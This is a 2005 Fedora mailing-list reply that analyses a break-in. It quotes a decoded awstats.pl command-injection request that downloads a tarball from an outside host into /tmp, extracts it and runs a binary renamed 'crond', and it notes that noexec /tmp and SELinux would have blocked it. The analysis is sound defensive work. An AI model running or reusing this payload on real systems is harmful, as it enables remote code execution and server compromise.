Re: Security Breach

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On Fri, 2005-03-04 at 12:51 -0600, Brian Fahrlander wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> 
> > Replace the url-encoded characters and you get:
> > 
> > /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget 
> > zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv 
> > mech crond;export PATH=;crond;echo e_exp;%00
> > 
> > So the attacker has tricked the script into executing a set of shell 
> > commands, which include changing directory to /tmp, downloading a 
> > tarball from a Romanian site, extracting that tarball and then executing 
> > a program from the downloaded and extracted tarball, after renaming it 
> > to "crond" in an effort to disguise it.
> 
>    Damned fine research.  Good job; I'm impressed.

Thank you!

Incidentally, some of the suggestions that came up earlier in this
discussion, namely mounting /tmp with the noexec option and running
SELinux, would have foiled *this particular* exploit of the awstats
vulnerability.

Paul.
-- 
Paul Howarth <paul@xxxxxxxxxxxx>


[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux